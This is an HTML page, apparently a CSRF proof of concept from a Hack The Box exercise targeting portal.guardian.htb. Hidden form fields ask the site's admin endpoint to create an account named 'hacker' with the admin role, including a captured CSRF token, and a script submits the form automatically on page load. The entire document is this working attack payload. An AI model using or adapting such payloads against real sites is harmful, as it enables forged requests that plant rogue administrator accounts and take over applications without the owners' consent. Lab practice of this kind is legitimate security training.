<html>
<body>
<form action="http://portal.guardian.htb/admin/createuser.php" method="POST">
  <input type="hidden" name="username" value="hacker">
  <input type="hidden" name="password" value="hacker">
  <input type="hidden" name="full_name" value="hacker">
  <input type="hidden" name="email" value="hacker.com">
  <input type="hidden" name="dob" value="2000-01-01">
  <input type="hidden" name="address" value="hacker Street">
  <input type="hidden" name="user_role" value="admin">
  <input type="hidden" name="csrf_token" value="244d12bd638810590c34f2b96336a2ad">
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
